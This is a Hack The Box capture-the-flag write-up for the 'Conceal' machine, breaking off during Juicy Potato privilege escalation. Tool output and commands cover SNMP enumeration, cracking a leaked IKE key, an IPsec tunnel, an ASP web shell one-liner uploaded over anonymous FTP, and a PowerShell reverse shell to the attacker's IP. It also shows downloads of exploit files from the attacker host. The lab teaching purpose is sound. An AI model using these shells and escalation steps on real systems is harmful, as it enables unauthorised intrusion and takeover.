Hack The Box Writeup – Conceal

It’s got SNMP enumeration, IPSec tunnel and it all ends with Juicy Potato windows exploit. Overall, a really fun box with a lot of learning opportunities.

We start off by running masscan. I am beginning to like this approach for my initial recon. Run it first, identify the ports and then run targeted nmap scans against those specific ports.

root@kali:~/htb/conceal# masscan -p1-65535,U:1-65535 10.10.10.116 --rate=1000 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2019-05-19 00:57:57 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 161/udp on 10.10.10.116 

Interestingly just one port 161 is open. Usual suspect ports might be hidden (CONCEAL ha!). Let’s run nmap on it and see what we find.

root@kali:~/htb/conceal# nmap -sV -sU -p161 10.10.10.116
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-18 21:15 EDT
Nmap scan report for 10.10.10.116
Host is up (0.038s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)
Service Info: Host: Conceal

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

Now further enumeration on SNMP can be done using -sC option of nmap, snmpwalk or snmp-check. I like snmp-check because of the neat display of the output.

root@kali:~/htb/conceal# snmp-check 10.10.10.116
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.116:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.116
  Hostname                      : Conceal
  Description                   : Hardware: Intel64 Family 6 Model 63 Stepping 2 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)
  Contact                       : IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43
  Location                      : -
  Uptime snmp                   : 01:19:22.29
  Uptime system                 : 01:18:56.02
  System date                   : 2019-5-19 02:06:31.1
  Domain                        : WORKGROUP

[*] User accounts:

  Guest               
  Destitute           
  Administrator       
  DefaultAccount      

[*] Network information:

  IP forwarding enabled         : no
  Default TTL                   : 128
  TCP segments received         : 148118
  TCP segments sent             : 8
  TCP segments retrans          : 4
  Input datagrams               : 456305
  Delivered datagrams           : 374282
  Output datagrams              : 1672

[*] Network interfaces:

  Interface                     : [ up ] Software Loopback Interface 1
  Id                            : 1
  Mac Address                   : :::::
  Type                          : softwareLoopback
  Speed                         : 1073 Mbps
  MTU                           : 1500
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IKEv2)
  Id                            : 2
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (PPTP)
  Id                            : 3
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Microsoft Kernel Debug Network Adapter
  Id                            : 4
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (L2TP)
  Id                            : 5
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] Teredo Tunneling Pseudo-Interface
  Id                            : 6
  Mac Address                   : 00:00:00:00:00:00
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IP)
  Id                            : 7
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (SSTP)
  Id                            : 8
  Mac Address                   : :::::
  Type                          : unknown
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (IPv6)
  Id                            : 9
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection
  Id                            : 10
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853

  Interface                     : [ down ] WAN Miniport (PPPOE)
  Id                            : 11
  Mac Address                   : :::::
  Type                          : ppp
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ down ] WAN Miniport (Network Monitor)
  Id                            : 12
  Mac Address                   : :::::
  Type                          : ethernet-csmacd
  Speed                         : 0 Mbps
  MTU                           : 0
  In octets                     : 0
  Out octets                    : 0

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer LightWeight Filter-0000
  Id                            : 13
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-0000
  Id                            : 14
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853

  Interface                     : [ up ] Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer LightWeight Filter-0000
  Id                            : 15
  Mac Address                   : 00:50:56:b2:17:48
  Type                          : ethernet-csmacd
  Speed                         : 1000 Mbps
  MTU                           : 1500
  In octets                     : 14959667
  Out octets                    : 160853


[*] Network IP:

  Id                    IP Address            Netmask               Broadcast           
  10                    10.10.10.116          255.255.255.0         1                   
  1                     127.0.0.1             255.0.0.0             1                   

[*] Routing information:

  Destination           Next hop              Mask                  Metric              
  0.0.0.0               10.10.10.2            0.0.0.0               281                 
  10.10.10.0            10.10.10.116          255.255.255.0         281                 
  10.10.10.116          10.10.10.116          255.255.255.255       281                 
  10.10.10.255          10.10.10.116          255.255.255.255       281                 
  127.0.0.0             127.0.0.1             255.0.0.0             331                 
  127.0.0.1             127.0.0.1             255.255.255.255       331                 
  127.255.255.255       127.0.0.1             255.255.255.255       331                 
  224.0.0.0             127.0.0.1             240.0.0.0             331                 
  255.255.255.255       127.0.0.1             255.255.255.255       331                 

[*] TCP connections and listening ports:

  Local address         Local port            Remote address        Remote port           State               
  0.0.0.0               21                    0.0.0.0               0                     listen              
  0.0.0.0               80                    0.0.0.0               0                     listen              
  0.0.0.0               135                   0.0.0.0               0                     listen              
  0.0.0.0               445                   0.0.0.0               0                     listen              
  0.0.0.0               49664                 0.0.0.0               0                     listen              
  0.0.0.0               49665                 0.0.0.0               0                     listen              
  0.0.0.0               49666                 0.0.0.0               0                     listen              
  0.0.0.0               49667                 0.0.0.0               0                     listen              
  0.0.0.0               49668                 0.0.0.0               0                     listen              
  0.0.0.0               49669                 0.0.0.0               0                     listen              
  0.0.0.0               49670                 0.0.0.0               0                     listen              
  10.10.10.116          139                   0.0.0.0               0                     listen              

[*] Listening UDP ports:

  Local address         Local port          
  0.0.0.0               123                 
  0.0.0.0               161                 
  0.0.0.0               500                 
  0.0.0.0               4500                
  0.0.0.0               5050                
  0.0.0.0               5353                
  0.0.0.0               5355                
  10.10.10.116          137                 
  10.10.10.116          138                 
  10.10.10.116          1900                
  10.10.10.116          63250               
  127.0.0.1             1900                
  127.0.0.1             63251               

[*] Network services:

  Index                 Name                
  0                     Power               
  1                     Server              
  2                     Themes              
  3                     IP Helper           
  4                     DNS Client          
  5                     Data Usage          
  6                     Superfetch          
  7                     DHCP Client         
  8                     Time Broker         
  9                     TokenBroker         
  10                    Workstation         
  11                    SNMP Service        
  12                    User Manager        
  13                    VMware Tools        
  14                    Windows Time        
  15                    CoreMessaging       
  16                    Plug and Play       
  17                    Print Spooler       
  18                    Windows Audio       
  19                    SSDP Discovery      
  20                    Task Scheduler      
  21                    Windows Search      
  22                    Security Center     
  23                    Storage Service     
  24                    Windows Firewall    
  25                    CNG Key Isolation   
  26                    COM+ Event System   
  27                    Windows Event Log   
  28                    IPsec Policy Agent  
  29                    Geolocation Service 
  30                    Group Policy Client 
  31                    RPC Endpoint Mapper 
  32                    Data Sharing Service
  33                    Device Setup Manager
  34                    Network List Service
  35                    System Events Broker
  36                    User Profile Service
  37                    Base Filtering Engine
  38                    Local Session Manager
  39                    Microsoft FTP Service
  40                    TCP/IP NetBIOS Helper
  41                    Cryptographic Services
  42                    COM+ System Application
  43                    Diagnostic Service Host
  44                    Shell Hardware Detection
  45                    State Repository Service
  46                    Diagnostic Policy Service
  47                    Network Connection Broker
  48                    Security Accounts Manager
  49                    Network Location Awareness
  50                    Windows Connection Manager
  51                    Windows Font Cache Service
  52                    Remote Procedure Call (RPC)
  53                    DCOM Server Process Launcher
  54                    Windows Audio Endpoint Builder
  55                    Application Host Helper Service
  56                    Network Store Interface Service
  57                    Client License Service (ClipSVC)
  58                    Distributed Link Tracking Client
  59                    System Event Notification Service
  60                    World Wide Web Publishing Service
  61                    Connected Devices Platform Service
  62                    Windows Defender Antivirus Service
  63                    Windows Management Instrumentation
  64                    Windows Process Activation Service
  65                    Distributed Transaction Coordinator
  66                    IKE and AuthIP IPsec Keying Modules
  67                    Microsoft Account Sign-in Assistant
  68                    VMware CAF Management Agent Service
  69                    VMware Physical Disk Helper Service
  70                    Background Intelligent Transfer Service
  71                    Background Tasks Infrastructure Service
  72                    Program Compatibility Assistant Service
  73                    VMware Alias Manager and Ticket Service
  74                    Connected User Experiences and Telemetry
  75                    WinHTTP Web Proxy Auto-Discovery Service
  76                    Windows Defender Security Centre Service
  77                    Windows Push Notifications System Service
  78                    Windows Defender Antivirus Network Inspection Service
  79                    Windows Driver Foundation - User-mode Driver Framework

[*] Processes:

  Id                    Status                Name                  Path                  Parameters          
  1                     running               System Idle Process                                             
  4                     running               System                                                          
  312                   running               smss.exe                                                        
  348                   running               svchost.exe           C:\Windows\System32\  -k LocalSystemNetworkRestricted
  384                   running               svchost.exe           C:\Windows\system32\  -k LocalService     
  392                   running               csrss.exe                                                       
  468                   running               wininit.exe                                                     
  484                   running               csrss.exe                                                       
  564                   running               winlogon.exe                                                    
  584                   running               services.exe                                                    
  616                   running               lsass.exe             C:\Windows\system32\                      
  700                   running               svchost.exe           C:\Windows\system32\  -k DcomLaunch       
  712                   running               fontdrvhost.exe                                                 
  720                   running               fontdrvhost.exe                                                 
  820                   running               svchost.exe           C:\Windows\system32\  -k RPCSS            
  908                   running               dwm.exe                                                         
  960                   running               svchost.exe           C:\Windows\system32\  -k netsvcs          
  968                   running               svchost.exe           C:\Windows\system32\  -k LocalServiceNoNetwork
  1008                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1036                  running               svchost.exe           C:\Windows\System32\  -k NetworkService   
  1100                  running               vmacthlp.exe          C:\Program Files\VMware\VMware Tools\                      
  1252                  running               Memory Compression                                              
  1288                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1372                  running               svchost.exe           C:\Windows\System32\  -k LocalServiceNetworkRestricted
  1384                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceNetworkRestricted
  1468                  running               spoolsv.exe           C:\Windows\System32\                      
  1528                  running               svchost.exe           C:\Windows\system32\  -k appmodel         
  1700                  running               svchost.exe           C:\Windows\system32\  -k apphost          
  1708                  running               svchost.exe           C:\Windows\System32\  -k utcsvc           
  1720                  running               svchost.exe           C:\Windows\system32\  -k ftpsvc           
  1764                  running               svchost.exe           C:\Windows\system32\  -k LocalSystemNetworkRestricted
  1804                  running               SecurityHealthService.exe                                            
  1812                  running               snmp.exe              C:\Windows\System32\                      
  1844                  running               VGAuthService.exe     C:\Program Files\VMware\VMware Tools\VMware VGAuth\                      
  1864                  running               vmtoolsd.exe          C:\Program Files\VMware\VMware Tools\                      
  1884                  running               ManagementAgentHost.exe  C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\                      
  1928                  running               svchost.exe           C:\Windows\system32\  -k iissvcs          
  1940                  running               MsMpEng.exe                                                     
  1980                  running               msdtc.exe             C:\Windows\System32\                      
  2144                  running               SearchIndexer.exe     C:\Windows\system32\  /Embedding          
  2580                  running               svchost.exe           C:\Windows\system32\  -k NetworkServiceNetworkRestricted
  2856                  running               SearchProtocolHost.exe  C:\Windows\system32\  Global\UsGthrFltPipeMssGthrPipe13_ Global\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 "Software\Microsoft\Windows Search" "Moz
  2904                  running               WmiPrvSE.exe          C:\Windows\system32\wbem\                      
  3020                  running               dllhost.exe           C:\Windows\system32\  /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}
  3064                  running               LogonUI.exe                                 /flags:0x0 /state0:0xa3a36855 /state1:0x41c64e6d
  3140                  running               svchost.exe           C:\Windows\system32\  -k LocalServiceAndNoImpersonation
  3220                  running               NisSrv.exe                                                      
  3760                  running               svchost.exe                                                     
  3880                  running               SearchFilterHost.exe  C:\Windows\system32\  0 700 704 712 8192 708

[*] Storage information:

  Description                   : ["C:\\ Label:  Serial Number 9606be7b"]
  Device id                     : [#<SNMP::Integer:0x01f70cb4 @value=1>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x020abdb8 @value=4096>]
  Memory size                   : 59.51 GB
  Memory used                   : 10.62 GB

  Description                   : ["D:\\"]
  Device id                     : [#<SNMP::Integer:0x020a9158 @value=2>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x020a8280 @value=0>]
  Memory size                   : 0 bytes
  Memory used                   : 0 bytes

  Description                   : ["Virtual Memory"]
  Device id                     : [#<SNMP::Integer:0x0209d6a0 @value=3>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x0209c73c @value=65536>]
  Memory size                   : 3.12 GB
  Memory used                   : 773.00 MB

  Description                   : ["Physical Memory"]
  Device id                     : [#<SNMP::Integer:0x02099b68 @value=4>]
  Filesystem type               : ["unknown"]
  Device unit                   : [#<SNMP::Integer:0x02098c18 @value=65536>]
  Memory size                   : 2.00 GB
  Memory used                   : 665.50 MB


[*] File system information:

  Index                         : 1
  Mount point                   : 
  Remote mount point            : -
  Access                        : 1
  Bootable                      : 0

[*] Device information:

  Id                    Type                  Status                Descr               
  1                     unknown               running               Microsoft XPS Document Writer v4
  2                     unknown               running               Microsoft Print To PDF
  3                     unknown               running               Microsoft Shared Fax Driver
  4                     unknown               running               Unknown Processor Type
  5                     unknown               running               Unknown Processor Type
  6                     unknown               unknown               Software Loopback Interface 1
  7                     unknown               unknown               WAN Miniport (IKEv2)
  8                     unknown               unknown               WAN Miniport (PPTP) 
  9                     unknown               unknown               Microsoft Kernel Debug Network Adapter
  10                    unknown               unknown               WAN Miniport (L2TP) 
  11                    unknown               unknown               Teredo Tunneling Pseudo-Interface
  12                    unknown               unknown               WAN Miniport (IP)   
  13                    unknown               unknown               WAN Miniport (SSTP) 
  14                    unknown               unknown               WAN Miniport (IPv6) 
  15                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection
  16                    unknown               unknown               WAN Miniport (PPPOE)
  17                    unknown               unknown               WAN Miniport (Network Monitor)
  18                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP Native MAC Layer
  19                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-QoS Packet Scheduler-
  20                    unknown               unknown               Intel(R) 82574L Gigabit Network Connection-WFP 802.3 MAC Layer L
  21                    unknown               unknown               D:\                 
  22                    unknown               running               Fixed Disk          
  23                    unknown               running               IBM enhanced (101- or 102-key) keyboard, Subtype=(0)

[*] Software components:

  Index                 Name                
  1                     Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
  2                     VMware Tools        
  3                     Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

[*] IIS server information:

  TotalBytesSentLowWord         : 0
  TotalBytesReceivedLowWord     : 0
  TotalFilesSent                : 0
  CurrentAnonymousUsers         : 0
  CurrentNonAnonymousUsers      : 0
  TotalAnonymousUsers           : 0
  TotalNonAnonymousUsers        : 0
  MaxAnonymousUsers             : 0
  MaxNonAnonymousUsers          : 0
  CurrentConnections            : 0
  MaxConnections                : 0
  ConnectionAttempts            : 0
  LogonAttempts                 : 0
  Gets                          : 0
  Posts                         : 0
  Heads                         : 0
  Others                        : 0
  CGIRequests                   : 0
  BGIRequests                   : 0
  NotFoundErrors                : 0

Looking closely at the output we can see under System Information > Contact we see IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43. That brings us to our next phase of IPSEC tunnels. This was something really new to me. To learn more about IPSEC tunnels this video can help. please look at the reference section right at the end of the blog. IKE or Internet Key Exchange is the protocol used to set up security associations (SA) to build a secure IPSEC tunnel between the server and the client. Couple of things we need to set up this tunnel is the password that can be obtained by cracking the PSK (Pre-Shared Key) using hashcat or some online cracking tool. Once cracked the password turns out to be Dudecake1!. Now lets find out the IKE IPSEC connection properties.

root@kali:~/htb/conceal# ike-scan -M 10.10.10.116
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116	Main Mode Handshake returned
	HDR=(CKY-R=206141060fff3765)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
	VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
	VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
	VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
	VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
	VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
	VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.056 seconds (17.74 hosts/sec).  1 returned handshake; 0 returned notify

Look at the SA line. It tells us the encoding, hashing algorithm, authentication mode for our connection. Now let’s set up strongswan on our Kali. I used the typical apt-get install strongswan. More details can be found here. Once installed let’s edit /etc/ipsec.conf configuration file by adding the lines below.

conn conceal
	authby=psk
	auto=start
	esp=3des-sha1
	ike=3des-sha1-modp1024
	keyexchange=ikev1
	type=transport
	right=10.10.10.116
	rightsubnet=10.10.10.116[tcp/]

Then we edit the /etc/ipsec.secrets file by adding our cracked password that we obtained from the PSK earlier.

10.10.10.116 : PSK "Dudecake1!"

Now let’s start ipsec service and check the status. We should be able to see that now we have successfully established an IPSEC tunnel between our Kali and the target machine.

root@kali:~/htb/conceal# ipsec start
 Starting strongSwan 5.7.2 IPsec [starter]…
 root@kali:~/htb/conceal# ipsec status
 Security Associations (1 up, 0 connecting):
      conceal[1]: ESTABLISHED 3 seconds ago, 10.10.14.23[10.10.14.23]…10.10.10.116[10.10.10.116]
      conceal{1}:  INSTALLED, TRANSPORT, reqid 1, ESP SPIs: c5bc3e98_i 219e450c_o
      conceal{1}:   10.10.14.23/32 === 10.10.10.116/32[tcp]

It’s now time to go back to the snmp-check output to see what other ports are open. Now that we have a secure tunnel, maybe we can access them. From that list lets try port 21 and port 80. We can see we have anonymous FTP access and we also have access to the web page powered by IIS.

root@kali:~/htb/conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> 

Next up, let’s run gobuster to see what we can find.

root@kali:~/htb/conceal# gobuster -u http://10.10.10.116 -w /usr/share/wordlists/dirb/common.txt 

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.116/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2019/05/18 21:42:17 Starting gobuster
=====================================================
/upload (Status: 301)
=====================================================
2019/05/18 21:43:00 Finished
=====================================================

Aha! An upload directory. Let’s try to upload a text file via FTP and see if we can access that file via the upload page in the browser.

root@kali:~/htb/conceal# echo "test upload" > test.txt
root@kali:~/htb/conceal# ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt
local: test.txt remote: test.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
13 bytes sent in 0.00 secs (93.3479 kB/s)
ftp> 

Success! Now we can craft a simple ASP reverse shell and browse it from the upload screen and hopefully we will get a reverse shell back to our Kali box. Before that an interesting thing to note is when we try to browse something that does not exist, IIS returns an error message that reveals the working directory. Look at the Physical Path label below.

Let’s upload a simple asp shell that will give us RCE using the cmd parameter. The ASP shell can look like this.

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

This gives us basic RCE where we can do stuff like http://10.10.10.116/upload/shell.asp?cmd=hostname

Now for our reverse shell, let’s use the popular Powershell reverse shell ny nishang found here. Let’s add the line Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.23 -Port 443 to the end of that file. Let’s upload our ASP shell and this updated Powershell script. Once uploaded, let’s start our netcat listener and browse to the following URL http://10.10.10.116/upload/shell.asp?cmd=cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\inetpub\wwwroot\upload\Invoke-PowerShellTcp.ps1 and yay! you have a shell! [Don’t forget to URL Encode the cmd param value.]

root@kali:~/htb/conceal# nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.116] 49673
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute
PS C:\Users\destitute\Desktop> type c:\Users\destitute\Desktop\proof.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Awesome! Now we have the user flag. Time for some privilege escalation. Enumeration on the current user shows something interesting. Notice the SeImpersonatePrivilege Impersonate a client after authentication Enabled

PS C:\Users\destitute\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

This tells us that we should be able to escalate our privileges using Rotten Potato but it did not work. I’m guessing its because of BITS. Anyway let’s try the Juicy Potato exploit. Download the following to your Kali machine from the Github url of Juicy Potato.
JuicyPotato.exe
CLSID.list
test_clsid.bat

Also create a rev.bat file and a rev.ps1 file. For rev.ps1, simply copy the file the file that was created for the user shell and just replace the reverse shell port to 444 from 443.

Rev.bat contents can look like this

root@kali:~/htb/conceal# cat rev.bat
cmd.exe /c powershell -ExecutionPolicy Bypass -File C:\users\destitute\rev.ps1

Host these 5 files on your Kali using apache or python. Download them to the victim.

PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/test_clsid.bat -OutFile C:\\Users\\destitute\\test_clsid.bat
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/CLSID.list -OutFile C:\\Users\\destitute\\CLSID.list
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/JuicyPotato.exe -OutFile C:\\Users\\destitute\\JuicyPotato.exe
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/rev.bat -OutFile C:\\Users\\destitute\\rev.bat
PS C:\users\destitute> Invoke-WebRequest -Uri 10.10.14.23:8000/rev.ps1 -OutFile C:\\Users\\destitute\\rev.ps1

Next, lets run the test_clsid.bat file on the victim. It will output the results to a text file. Look at it and pick any CLSID. Let’s pick {47135eea-06b6-4452-8787-4a187c64a47e}

PS C:\users\destitute> type result.log
{0289a7c5-91bf-4547-81ae-fec91a89dec5};CONCEAL\Destitute
{98068995-54d2-4136-9bc9-6dbcb0a4683f};CONCEAL\Destitute
{9acf41ed-d457-4cc1-941b-ab02c26e4686};CONCEAL\Destitute
{9678f47f-2435-475c-b24a-4606f8161c16};CONCEAL\Destitute
{417976B7-917D-4F1E-8F14-C18FCCB0B3A8};CONCEAL\Destitute
{90F18417-F0F1-484E-9D3C-59DCEEE5DBD8};NT AUTHORITY\SYSTEM
{B441840A-5CEF-42F1-BE06-4E31A90E74D7};NT AUTHORITY\LOCAL SERVICE
{B7BC3EB9-B145-4574-B729-7D78126EB4C8};NT AUTHORITY\LOCAL SERVICE
{A8BE33B3-D275-459B-A853-A2150531C8B3};NT AUTHORITY\LOCAL SERVICE
{9694B5A2-54CE-4837-BA0A-F52FD7699F12};NT AUTHORITY\LOCAL SERVICE
{A0D76288-0FB2-477A-96F9-F7EFFD7ED5D3};NT AUTHORITY\LOCAL SERVICE
{CC9FA1A3-ADDE-49A9-B435-34CE6E5DA3DB};NT AUTHORITY\LOCAL SERVICE
{F1B75166-312C-4DC6-BA41-C2E2486C9913};NT AUTHORITY\LOCAL SERVICE
{F94358B1-E9AE-4D5C-AF66-CE50E67803C7};NT AUTHORITY\LOCAL SERVICE
{EA5EAA7B-1E81-4C76-BF2D-F2A867F764A1};NT AUTHORITY\LOCAL SERVICE
{DAB26424-5F5C-4834-8685-A4DB44DF8083};NT AUTHORITY\LOCAL SERVICE
{DF175E5E-5488-49B7-BCB9-B7204933E26F};NT AUTHORITY\LOCAL SERVICE
{4D098DC6-3080-4A11-9887-4C77FD7C2ED2};NT AUTHORITY\LOCAL SERVICE
{46B559E9-0D2F-44AC-9EE7-AE6D9384B292};NT AUTHORITY\LOCAL SERVICE
{557C6CBF-CD77-45CF-84E8-8F5A8A331BAD};NT AUTHORITY\LOCAL SERVICE
{37998346-3765-45B1-8C66-AA88CA6B20B8};NT AUTHORITY\LOCAL SERVICE
{206490E7-09B5-4C9D-8E54-254B87A5CEAF};NT AUTHORITY\LOCAL SERVICE
{1F3775BA-4FA2-4CA0-825F-5B9EC63C0029};NT AUTHORITY\LOCAL SERVICE
{235EB944-F722-47DB-8EE7-1EE27A8D4F98};NT AUTHORITY\LOCAL SERVICE
{21F282D1-A881-49E1-9A3A-26E44E39B86C};NT AUTHORITY\LOCAL SERVICE
{7ECB3DBE-742D-4B43-BF3E-2587BE1BFF72};NT AUTHORITY\LOCAL SERVICE
{770FDC97-76E7-4067-B14C-2DDB3A7517F2};NT AUTHORITY\LOCAL SERVICE
{8190FA8C-3A62-49FB-B145-071B4B74578D};NT AUTHORITY\LOCAL SERVICE
{7ECC8054-7AE3-486D-9CBA-8ED0B5ED61AC};NT AUTHORITY\LOCAL SERVICE
{754EC012-E0B0-4F32-A810-77F639CBF103};NT AUTHORITY\LOCAL SERVICE
{73978CED-828C-49AB-A403-9ABACDCE1505};NT AUTHORITY\LOCAL SERVICE
{680442B0-692A-465C-B47D-783C4EC5B6A2};NT AUTHORITY\LOCAL SERVICE
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
{42CBFAA7-A4A7-47BB-B422-BD10E9D02700};NT AUTHORITY\SYSTEM
{5B99FA76-721C-423C-ADAC-56D03C8A8007};NT AUTHORITY\SYSTEM
{42C21DF5-FB58-4102-90E9-96A213DC7CE8};NT AUTHORITY\SYSTEM
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744};NT AUTHORITY\SYSTEM
{C63261E4-6052-41FF-B919-496FECF4C4E5};NT AUTHORITY\SYSTEM
{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\LOCAL SERVICE
{08D9DFDF-C6F7-404A-A20F-66EEC0A609CD};NT AUTHORITY\SYSTEM
{22f5b1df-7d7a-4d21-97f8-c21aefba859c};NT AUTHORITY\LOCAL SERVICE
{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\LOCAL SERVICE
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
{581333F6-28DB-41BE-BC7A-FF201F12F3F6};NT AUTHORITY\LOCAL SERVICE
{47135eea-06b6-4452-8787-4a187c64a47e};NT AUTHORITY\SYSTEM
{687e55ca-6621-4c41-b9f1-c0eddc94bb05};NT AUTHORITY\SYSTEM
{B31118B2-1F49-48E5-B6F5-BC21CAEC56FB};NT AUTHORITY\SYSTEM
{6d8ff8e5-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{204810b9-73b2-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e1-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{6d8ff8e7-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
{2e5e84e9-4049-4244-b728-2d24227157c7};NT AUTHORITY\LOCAL SERVICE
{6d8ff8dd-730d-11d4-bf42-00b0d0118b56};NT AUTHORITY\LOCAL SERVICE
